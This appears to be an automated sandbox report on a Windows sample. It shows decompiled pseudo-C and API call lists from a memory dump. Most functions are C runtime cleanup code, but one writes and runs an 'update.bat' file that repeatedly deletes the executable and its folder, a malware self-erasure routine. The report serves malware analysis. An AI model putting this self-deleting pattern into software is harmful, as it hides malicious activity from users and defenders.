                    						E014012E1(_v40);
                    						_t168 = 1;
                    						__eflags = 1;
                    						goto L37;
                    					} else {
                    						_t122 = _t168;
                    						do {
                    							 *(_t122 + _t195) = _t122;
                    							_t122 = _t122 + 1;
                    						} while (_t122 < 0x100);
                    						if(GetCPInfo( *(_t208 + 8),  &_v28) == 0) {
                    							goto L36;
                    						}
                    						_t125 = _v28;
                    						_t232 = _t125 - 5;
                    						if(_t125 > 5) {
                    							goto L36;
                    						}
                    						_t28 = _t195 + 1; // 0x1
                    						_v48 = _t125 & 0x0000ffff;
                    						_t129 = E014097D9(_t168, _t232, _t168,  *((intOrPtr*)(_t208 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t208 + 8), _t168);
                    						_t216 = _t216 + 0x24;
                    						_t233 = _t129;
                    						if(_t129 == 0) {
                    							goto L36;
                    						}
                    						_t34 = _t195 + 1; // 0x1
                    						_t133 = E014097D9(_t168, _t233, _t168,  *((intOrPtr*)(_t208 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t208 + 8), _t168);
                    						_t216 = _t216 + 0x24;
                    						if(_t133 == 0) {
                    							goto L36;
                    						}
                    						if(_v48 <= 1 || _v22 == _t168) {
                    							L22:
                    							_v60 = _v32 + 0x100;
                    							_t136 = E01409CD8(_t239, _t168, 1, _t195, 0x100, _v32 + 0x100,  *(_t208 + 8), _t168);
                    							_t216 = _t216 + 0x1c;
                    							if(_t136 == 0) {
                    								goto L36;
                    							}
                    							_t191 = _v32;
                    							_t137 = _t191 + 0xfe;
                    							 *_t137 = 0;
                    							_t177 = _v36;
                    							_v32 = _t137;
                    							_t138 = _v40;
                    							 *(_t177 + 0x7f) = _t168;
                    							_t178 = _t177 - 0xffffff80;
                    							 *(_t138 + 0x7f) = _t168;
                    							_v68 = _t178;
                    							 *_t178 = _t168;
                    							_t179 = _t138 + 0x80;
                    							_v56 = _t179;
                    							 *_t179 = _t168;
                    							if(_v48 <= 1 || _v22 == _t168) {
                    								L32:
                    								_t180 = 0x3f;
                    								memcpy(_t191, _t191 + 0x200, _t180 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								_t140 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                    								_push(0x1f);
                    								asm("movsw");
                    								asm("movsb");
                    								_t141 = memcpy(_t140, _t140 + 0x100, 0 << 2);
                    								asm("movsw");
                    								asm("movsb");
                    								_t212 = _v64;
                    								if( *((intOrPtr*)(_t212 + 0x8c)) != 0) {
                    									asm("lock xadd [ecx], eax");
                    									if((_t141 | 0xffffffff) == 0) {
                    										E014012E1( *(_t212 + 0x90) - 0xfe);
                    										E014012E1( *(_t212 + 0x94) - 0x80);
                    										E014012E1( *(_t212 + 0x98) - 0x80);
                    										E014012E1( *((intOrPtr*)(_t212 + 0x8c)));
                    									}
                    								}
                    								_t142 = _v44;
                    								 *_t142 = 1;
                    								 *((intOrPtr*)(_t212 + 0x8c)) = _t142;
                    								 *_t212 = _v60;
                    								 *(_t212 + 0x90) = _v32;
                    								 *(_t212 + 0x94) = _v68;
                    								 *(_t212 + 0x98) = _v56;
                    								 *(_t212 + 4) = _v48;
                    								L37:
                    								E014012E1(_v52);
                    								_t104 = _t168;
                    								goto L41;
                    							} else {
                    								_t187 =  &_v21;
                    								while(1) {
                    									_t159 =  *_t187;
                    									if(_t159 == 0) {
                    										break;
                    									}
                    									_t213 =  *(_t187 - 1) & 0x000000ff;
                    									if(_t213 > (_t159 & 0x000000ff)) {
                    										L30:
                    										_t187 =  &(_t187[2]);
                    										if( *(_t187 - 1) != _t168) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_t207 = _t191 + 0x100 + _t213 * 2;
                    									do {
                    										_t213 = _t213 + 1;
                    										 *_t207 = 0x8000;
                    										_t207 = _t207 + 2;
                    									} while (_t213 <= ( *_t187 & 0x000000ff));
                    									goto L30;
                    								}
                    								goto L32;
                    							}
                    						} else {
                    							_t188 =  &_v21;
                    							while(1) {
                    								_t164 =  *_t188;
                    								if(_t164 == 0) {
                    									goto L22;
                    								}
                    								_t193 =  *(_t188 - 1) & 0x000000ff;
                    								_t165 = _t164 & 0x000000ff;
                    								while(_t193 <= _t165) {
                    									 *((char*)(_t193 + _t195)) = 0x20;
                    									_t193 = _t193 + 1;
                    									__eflags = _t193;
                    									_t165 =  *_t188 & 0x000000ff;
                    								}
                    								_t188 =  &(_t188[2]);
                    								_t239 =  *(_t188 - 1) - _t168;
                    								if( *(_t188 - 1) != _t168) {
                    									continue;
                    								}
                    								goto L22;
                    							}
                    							goto L22;
                    						}
                    					}
                    				}
                    				_push(_t106);
                    				_push(0x1004);
                    				_push(_t170);
                    				_push(0);
                    				_push( &_v76);
                    				_t167 = E01409B26(__edx);
                    				_t216 = _t215 + 0x14;
                    				if(_t167 != 0) {
                    					goto L36;
                    				}
                    				goto L3;
                    			}
























































                    0x01400aee
                    0x01400af5
                    0x01400afa
                    0x01400afd
                    0x01400b00
                    0x01400b03
                    0x01400b06
                    0x01400b0c
                    0x01400b0f
                    0x01400b12
                    0x01400b15
                    0x01400b18
                    0x01400b1d
                    0x01400e3d
                    0x01400e3f
                    0x01400e41
                    0x01400e41
                    0x01400e44
                    0x01400e4a
                    0x01400e4a
                    0x01400e4c
                    0x01400e52
                    0x01400e58
                    0x01400e62
                    0x01400e6c
                    0x01400e73
                    0x01400e83
                    0x01400e83
                    0x01400b23
                    0x01400b26
                    0x01400b2b
                    0x01400b49
                    0x01400b53
                    0x01400b56
                    0x01400b69
                    0x01400b6c
                    0x01400b7a
                    0x01400b7d
                    0x01400b8b
                    0x01400b8e
                    0x01400b9f
                    0x01400ba2
                    0x01400ba5
                    0x01400baa
                    0x01400bb0
                    0x01400e04
                    0x01400e07
                    0x01400e0f
                    0x01400e17
                    0x01400e1f
                    0x01400e29
                    0x01400e29
                    0x00000000
                    0x01400bd9
                    0x01400bd9
                    0x01400bdb
                    0x01400bdb
                    0x01400bde
                    0x01400bdf
                    0x01400bf5
                    0x00000000
                    0x00000000
                    0x01400bfb
                    0x01400bfe
                    0x01400c01
                    0x00000000
                    0x00000000
                    0x01400c0e
                    0x01400c11
                    0x01400c31
                    0x01400c36
                    0x01400c39
                    0x01400c3b
                    0x00000000
                    0x00000000
                    0x01400c55
                    0x01400c65
                    0x01400c6a
                    0x01400c6f
                    0x00000000
                    0x00000000
                    0x01400c79
                    0x01400ca6
                    0x01400cbc
                    0x01400cbf
                    0x01400cc4
                    0x01400cc9
                    0x00000000
                    0x00000000
                    0x01400ccf
                    0x01400cd4
                    0x01400cda
                    0x01400cdd
                    0x01400ce0
                    0x01400ce3
                    0x01400ce6
                    0x01400ce9
                    0x01400cf0
                    0x01400cf3
                    0x01400cf6
                    0x01400cf8
                    0x01400cfe
                    0x01400d01
                    0x01400d03
                    0x01400d45
                    0x01400d47
                    0x01400d50
                    0x01400d55
                    0x01400d58
                    0x01400d62
                    0x01400d64
                    0x01400d67
                    0x01400d69
                    0x01400d72
                    0x01400d74
                    0x01400d76
                    0x01400d77
                    0x01400d82
                    0x01400d87
                    0x01400d8b
                    0x01400d99
                    0x01400dac
                    0x01400dba
                    0x01400dc5
                    0x01400dca
                    0x01400d8b
                    0x01400dcd
                    0x01400dd0
                    0x01400dd6
                    0x01400ddf
                    0x01400de4
                    0x01400ded
                    0x01400df6
                    0x01400dff
                    0x01400e2a
                    0x01400e2d
                    0x01400e33
                    0x00000000
                    0x01400d0a
                    0x01400d0a
                    0x01400d0d
                    0x01400d0d
                    0x01400d11
                    0x00000000
                    0x00000000
                    0x01400d13
                    0x01400d1c
                    0x01400d3a
                    0x01400d3a
                    0x01400d40
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01400d40
                    0x01400d24
                    0x01400d27
                    0x01400d2c
                    0x01400d2d
                    0x01400d30
                    0x01400d36
                    0x00000000
                    0x01400d27
                    0x00000000
                    0x01400d42
                    0x01400c80
                    0x01400c80
                    0x01400c83
                    0x01400c83
                    0x01400c87
                    0x00000000
                    0x00000000
                    0x01400c89
                    0x01400c8d
                    0x01400c9a
                    0x01400c92
                    0x01400c96
                    0x01400c96
                    0x01400c97
                    0x01400c97
                    0x01400c9e
                    0x01400ca1
                    0x01400ca4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01400ca4
                    0x00000000
                    0x01400c83
                    0x01400c79
                    0x01400bb0
                    0x01400b2d
                    0x01400b2e
                    0x01400b33
                    0x01400b37
                    0x01400b38
                    0x01400b39
                    0x01400b3e
                    0x01400b43
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: 582e29e075c6eaf7e32f19bb4f9d99f92d014eabe15b81efb1cea20054d8a064
                    • Instruction ID: 6995e4ffaceb47f4210e3d306818dd21e2f7fcd9415903334008a518cba965ca
                    • Opcode Fuzzy Hash: 582e29e075c6eaf7e32f19bb4f9d99f92d014eabe15b81efb1cea20054d8a064
                    • Instruction Fuzzy Hash: 56B172B19002069FDB12DFAAC880BEEBBF5BF18350F14407EF559B72A1D77598418B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140EAA1(intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t25;
                    				intOrPtr* _t26;
                    				intOrPtr _t28;
                    				intOrPtr* _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t45;
                    				intOrPtr* _t46;
                    				intOrPtr* _t47;
                    				intOrPtr* _t55;
                    				intOrPtr* _t70;
                    				intOrPtr _t74;
                    
                    				_t74 = _a4;
                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                    				if(_t25 != 0 && _t25 != 0x1435348) {
                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                    					if(_t45 != 0 &&  *_t45 == 0) {
                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                    						if(_t46 != 0 &&  *_t46 == 0) {
                    							E014012E1(_t46);
                    							E0140DDFA( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                    						if(_t47 != 0 &&  *_t47 == 0) {
                    							E014012E1(_t47);
                    							E0140E2B4( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						E014012E1( *((intOrPtr*)(_t74 + 0x7c)));
                    						E014012E1( *((intOrPtr*)(_t74 + 0x88)));
                    					}
                    				}
                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                    				if(_t26 != 0 &&  *_t26 == 0) {
                    					E014012E1( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                    					E014012E1( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                    					E014012E1( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                    					E014012E1( *((intOrPtr*)(_t74 + 0x8c)));
                    				}
                    				E0140EC14( *((intOrPtr*)(_t74 + 0x9c)));
                    				_t28 = 6;
                    				_t55 = _t74 + 0xa0;
                    				_v8 = _t28;
                    				_t70 = _t74 + 0x28;
                    				do {
                    					if( *((intOrPtr*)(_t70 - 8)) != 0x14354a0) {
                    						_t31 =  *_t70;
                    						if(_t31 != 0 &&  *_t31 == 0) {
                    							E014012E1(_t31);
                    							E014012E1( *_t55);
                    						}
                    						_t28 = _v8;
                    					}
                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                    						if(_t29 != 0 &&  *_t29 == 0) {
                    							E014012E1(_t29);
                    						}
                    						_t28 = _v8;
                    					}
                    					_t55 = _t55 + 4;
                    					_t70 = _t70 + 0x10;
                    					_t28 = _t28 - 1;
                    					_v8 = _t28;
                    				} while (_t28 != 0);
                    				return E014012E1(_t74);
                    			}















                    0x0140eaa9
                    0x0140eaad
                    0x0140eab5
                    0x0140eabe
                    0x0140eac3
                    0x0140eaca
                    0x0140ead2
                    0x0140eada
                    0x0140eae5
                    0x0140eaeb
                    0x0140eaec
                    0x0140eaf4
                    0x0140eafc
                    0x0140eb07
                    0x0140eb0d
                    0x0140eb11
                    0x0140eb1c
                    0x0140eb22
                    0x0140eac3
                    0x0140eb23
                    0x0140eb2b
                    0x0140eb3e
                    0x0140eb51
                    0x0140eb5f
                    0x0140eb6a
                    0x0140eb6f
                    0x0140eb78
                    0x0140eb80
                    0x0140eb81
                    0x0140eb87
                    0x0140eb8a
                    0x0140eb8d
                    0x0140eb94
                    0x0140eb96
                    0x0140eb9a
                    0x0140eba2
                    0x0140eba9
                    0x0140ebaf
                    0x0140ebb0
                    0x0140ebb0
                    0x0140ebb7
                    0x0140ebb9
                    0x0140ebbe
                    0x0140ebc6
                    0x0140ebcb
                    0x0140ebcc
                    0x0140ebcc
                    0x0140ebcf
                    0x0140ebd2
                    0x0140ebd5
                    0x0140ebd8
                    0x0140ebd8
                    0x0140ebea

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0140EAE5
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE17
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE29
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE3B
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE4D
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE5F
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE71
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE83
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE95
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DEA7
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DEB9
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DECB
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DEDD
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DEEF
                    • _free.LIBCMT ref: 0140EADA
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 0140EAFC
                    • _free.LIBCMT ref: 0140EB11
                    • _free.LIBCMT ref: 0140EB1C
                    • _free.LIBCMT ref: 0140EB3E
                    • _free.LIBCMT ref: 0140EB51
                    • _free.LIBCMT ref: 0140EB5F
                    • _free.LIBCMT ref: 0140EB6A
                    • _free.LIBCMT ref: 0140EBA2
                    • _free.LIBCMT ref: 0140EBA9
                    • _free.LIBCMT ref: 0140EBC6
                    • _free.LIBCMT ref: 0140EBDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 8b72beaebd93a7e848669106750bbd09eb73290c9205fc4271c4b67b9b28186e
                    • Instruction ID: c9840db402379ffffa2fcf2ae21198f956b259dd8bac1375d0c2ce6f2bc73802
                    • Opcode Fuzzy Hash: 8b72beaebd93a7e848669106750bbd09eb73290c9205fc4271c4b67b9b28186e
                    • Instruction Fuzzy Hash: 14314E715046069BEB22AB6BD884B5777E9EF10710F14483FE45AF62F1DA71E860CA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E013C9E22() {
                    				signed int _v8;
                    				char _v268;
                    				char _v528;
                    				char _v788;
                    				long _v792;
                    				void* _v804;
                    				void* __ebp;
                    				signed int _t27;
                    				intOrPtr _t31;
                    				char _t34;
                    				char* _t36;
                    				intOrPtr _t40;
                    				intOrPtr _t41;
                    				intOrPtr _t42;
                    				void _t49;
                    				void* _t58;
                    				intOrPtr* _t63;
                    				void* _t66;
                    				intOrPtr* _t69;
                    				void* _t71;
                    				void* _t73;
                    				void* _t74;
                    				intOrPtr* _t77;
                    				void* _t79;
                    				signed int _t80;
                    				void* _t81;
                    
                    				_t27 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t27 ^ _t80;
                    				GetTempPathA(0x104,  &_v268);
                    				_t73 =  &_v268 - 1;
                    				do {
                    					_t31 =  *((intOrPtr*)(_t73 + 1));
                    					_t73 = _t73 + 1;
                    				} while (_t31 != 0);
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsw");
                    				asm("movsb");
                    				GetModuleFileNameA(0,  &_v528, 0x104);
                    				_t58 = 0;
                    				do {
                    					_t34 =  *((intOrPtr*)(_t80 + _t58 - 0x20c));
                    					 *((char*)(_t80 + _t58 - 0x310)) = _t34;
                    					_t58 = _t58 + 1;
                    				} while (_t34 != 0);
                    				_t36 = E013F59F0( &_v788, 0x5c);
                    				if(_t36 != 0) {
                    					 *_t36 = 0;
                    				}
                    				_t74 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                    				if(_t74 != 0xffffffff) {
                    					_t63 = ":Repeat\r\ndel \"%s\"\r\nif exist \"%s\" goto Repeat\r\nrmdir \"%s\"\r\ndel \"%s\"";
                    					do {
                    						_t40 =  *_t63;
                    						_t63 = _t63 + 1;
                    					} while (_t40 != 0);
                    					_t69 =  &_v528;
                    					do {
                    						_t41 =  *_t69;
                    						_t69 = _t69 + 1;
                    					} while (_t41 != 0);
                    					_t77 =  &_v268;
                    					do {
                    						_t42 =  *_t77;
                    						_t77 = _t77 + 1;
                    					} while (_t42 != 0);
                    					E013F2CE0();
                    					_t79 = _t81;
                    					wsprintfA(_t79, ":Repeat\r\ndel \"%s\"\r\nif exist \"%s\" goto Repeat\r\nrmdir \"%s\"\r\ndel \"%s\"",  &_v528,  &_v528,  &_v788,  &_v268);
                    					_t66 = _t79;
                    					_t71 = _t66 + 1;
                    					do {
                    						_t49 =  *_t66;
                    						_t66 = _t66 + 1;
                    					} while (_t49 != 0);
                    					WriteFile(_t74, _t79, _t66 - _t71,  &_v792, 0);
                    					CloseHandle(_t74);
                    					_t38 = ShellExecuteA(0, "open",  &_v268, 0, 0, 0);
                    				}
                    				return E013F268B(_t38, _v8 ^ _t80);
                    			}





























                    0x013c9e2b
                    0x013c9e32
                    0x013c9e45
                    0x013c9e51
                    0x013c9e52
                    0x013c9e52
                    0x013c9e55
                    0x013c9e56
                    0x013c9e69
                    0x013c9e6b
                    0x013c9e6c
                    0x013c9e6e
                    0x013c9e6f
                    0x013c9e75
                    0x013c9e77
                    0x013c9e77
                    0x013c9e7e
                    0x013c9e85
                    0x013c9e86
                    0x013c9e93
                    0x013c9e9c
                    0x013c9e9e
                    0x013c9e9e
                    0x013c9ebc
                    0x013c9ec1
                    0x013c9ec7
                    0x013c9ecf
                    0x013c9ecf
                    0x013c9ed1
                    0x013c9ed2
                    0x013c9ed8
                    0x013c9ee1
                    0x013c9ee1
                    0x013c9ee3
                    0x013c9ee4
                    0x013c9eea
                    0x013c9ef3
                    0x013c9ef3
                    0x013c9ef5
                    0x013c9ef6
                    0x013c9f04
                    0x013c9f09
                    0x013c9f27
                    0x013c9f2d
                    0x013c9f32
                    0x013c9f35
                    0x013c9f35
                    0x013c9f37
                    0x013c9f38
                    0x013c9f4b
                    0x013c9f52
                    0x013c9f68
                    0x013c9f68
                    0x013c9f84

                    APIs
                    • GetTempPathA.KERNEL32(00000104,?), ref: 013C9E45
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013C9E6F
                    • _strrchr.LIBCMT ref: 013C9E93
                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 013C9EB6
                    • wsprintfA.USER32(?,:Repeatdel "%s"if exist "%s" goto Repeatrmdir "%s"del "%s",?,?,?,?), ref: 013C9F27
                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 013C9F4B
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 013C9F52
                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000,?,?,?,00000000), ref: 013C9F68
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateExecuteHandleModuleNamePathShellTempWrite_strrchrwsprintf
                    • String ID: :Repeatdel "%s"if exist "%s" goto Repeatrmdir "%s"del "%s"$open$update.bat
                    • API String ID: 2071346621-1550444414
                    • Opcode ID: 797d98fea79eb8a2213242201dd8dbf912a669a5e8db5c339db4aa1bc870b96c
                    • Instruction ID: 1ca53a4c830307f9ab3f3c760dc2e43ffb92b8a0c9a12c645ac3892076896afa
                    • Opcode Fuzzy Hash: 797d98fea79eb8a2213242201dd8dbf912a669a5e8db5c339db4aa1bc870b96c
                    • Instruction Fuzzy Hash: C741FBB55001499FDF25CF68DC84EFA7B6CEF45748F1002D9E98997102D6715E4A8F70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0140DEF8(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				intOrPtr* _v20;
                    				signed int _v24;
                    				char _v28;
                    				signed int _t105;
                    				signed int _t115;
                    				signed int _t117;
                    				signed int _t121;
                    				signed int _t125;
                    				signed int _t129;
                    				signed int _t133;
                    				signed int _t137;
                    				signed int _t141;
                    				signed int _t145;
                    				signed int _t149;
                    				signed int _t153;
                    				signed int _t157;
                    				signed int _t161;
                    				signed int _t165;
                    				signed int _t169;
                    				signed int _t173;
                    				signed int _t177;
                    				signed int _t181;
                    				signed int _t185;
                    				signed int _t189;
                    				char _t195;
                    				char _t210;
                    				signed int _t213;
                    				void* _t224;
                    				char* _t226;
                    				signed int _t227;
                    				signed int _t231;
                    				signed int _t232;
                    				intOrPtr _t233;
                    				void* _t234;
                    				void* _t236;
                    				char* _t257;
                    
                    				_t224 = __edx;
                    				_t210 = _a4;
                    				_v16 = 0;
                    				_v28 = _t210;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                    					_t234 = E014009B2(0, 1, 0x50);
                    					_v8 = _t234;
                    					E014012E1(0);
                    					if(_t234 != 0) {
                    						_t227 = E014009B2(0, 1, 4);
                    						_v12 = _t227;
                    						E014012E1(0);
                    						if(_t227 != 0) {
                    							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                    								_t213 = 0x14;
                    								memcpy(_v8, 0x1435348, _t213 << 2);
                    								L25:
                    								_t236 = _v8;
                    								_t231 = _v16;
                    								 *_t236 =  *( *(_t210 + 0x88));
                    								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                    								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                    								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                    								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                    								 *_v12 = 1;
                    								if(_t231 != 0) {
                    									 *_t231 = 1;
                    								}
                    								goto L27;
                    							}
                    							_t232 = E014009B2(0, 1, 4);
                    							_v16 = _t232;
                    							E014012E1(0);
                    							if(_t232 != 0) {
                    								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                    								_t14 = _t234 + 0xc; // 0xc
                    								_t115 = E01409B26(_t224);
                    								_t117 = E01409B26(_t224,  &_v28, 1, _t233, 0x14, _v8 + 0x10,  &_v28);
                    								_t121 = E01409B26(_t224,  &_v28, 1, _t233, 0x16, _v8 + 0x14, 1);
                    								_t125 = E01409B26(_t224,  &_v28, 1, _t233, 0x17, _v8 + 0x18, _t233);
                    								_v20 = _v8 + 0x1c;
                    								_t129 = E01409B26(_t224,  &_v28, 1, _t233, 0x18, _v8 + 0x1c, 0x15);
                    								_t133 = E01409B26(_t224,  &_v28, 1, _t233, 0x50, _v8 + 0x20, _t14);
                    								_t137 = E01409B26(_t224);
                    								_t141 = E01409B26(_t224,  &_v28, 0, _t233, 0x1a, _v8 + 0x28,  &_v28);
                    								_t145 = E01409B26(_t224,  &_v28, 0, _t233, 0x19, _v8 + 0x29, 1);
                    								_t149 = E01409B26(_t224,  &_v28, 0, _t233, 0x54, _v8 + 0x2a, _t233);
                    								_t153 = E01409B26(_t224,  &_v28, 0, _t233, 0x55, _v8 + 0x2b, 0x51);
                    								_t157 = E01409B26(_t224,  &_v28, 0, _t233, 0x56, _v8 + 0x2c, _v8 + 0x24);
                    								_t161 = E01409B26(_t224);
                    								_t165 = E01409B26(_t224,  &_v28, 0, _t233, 0x52, _v8 + 0x2e,  &_v28);
                    								_t169 = E01409B26(_t224,  &_v28, 0, _t233, 0x53, _v8 + 0x2f, 0);
                    								_t173 = E01409B26(_t224,  &_v28, 2, _t233, 0x15, _v8 + 0x38, _t233);
                    								_t177 = E01409B26(_t224,  &_v28, 2, _t233, 0x14, _v8 + 0x3c, 0x57);
                    								_t181 = E01409B26(_t224,  &_v28, 2, _t233, 0x16, _v8 + 0x40, _v8 + 0x2d);
                    								_push(_v8 + 0x44);
                    								_push(0x17);
                    								_push(_t233);
                    								_t185 = E01409B26(_t224);
                    								_t189 = E01409B26(_t224,  &_v28, 2, _t233, 0x50, _v8 + 0x48,  &_v28);
                    								if((E01409B26(_t224,  &_v28, 2, _t233, 0x51, _v8 + 0x4c, 2) | _t115 | _t117 | _t121 | _t125 | _t129 | _t133 | _t137 | _t141 | _t145 | _t149 | _t153 | _t157 | _t161 | _t165 | _t169 | _t173 | _t177 | _t181 | _t185 | _t189) == 0) {
                    									_t226 =  *_v20;
                    									while( *_t226 != 0) {
                    										_t195 =  *_t226;
                    										if(_t195 < 0x30 || _t195 > 0x39) {
                    											if(_t195 != 0x3b) {
                    												goto L17;
                    											}
                    											_t257 = _t226;
                    											do {
                    												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                    												_t257 = _t257 + 1;
                    											} while ( *_t257 != 0);
                    										} else {
                    											 *_t226 = _t195 - 0x30;
                    											L17:
                    											_t226 = _t226 + 1;
                    										}
                    									}
                    									goto L25;
                    								}
                    								E0140DDFA(_v8);
                    								E014012E1(_v8);
                    								E014012E1(_v12);
                    								E014012E1(_v16);
                    								goto L4;
                    							}
                    							E014012E1(_t234);
                    							E014012E1(_v12);
                    							L7:
                    							goto L4;
                    						}
                    						E014012E1(_t234);
                    						goto L7;
                    					}
                    					L4:
                    					return 1;
                    				} else {
                    					_t231 = 0;
                    					_v12 = 0;
                    					_t236 = 0x1435348;
                    					L27:
                    					_t105 =  *(_t210 + 0x84);
                    					if(_t105 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t105 | 0xffffffff) == 0) {
                    							E014012E1( *(_t210 + 0x88));
                    							E014012E1( *((intOrPtr*)(_t210 + 0x7c)));
                    						}
                    					}
                    					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                    					 *(_t210 + 0x84) = _t231;
                    					 *(_t210 + 0x88) = _t236;
                    					return 0;
                    				}
                    			}










































                    0x0140def8
                    0x0140df01
                    0x0140df08
                    0x0140df0b
                    0x0140df0e
                    0x0140df17
                    0x0140df39
                    0x0140df3d
                    0x0140df40
                    0x0140df4a
                    0x0140df5d
                    0x0140df61
                    0x0140df64
                    0x0140df6e
                    0x0140df80
                    0x0140e216
                    0x0140e217
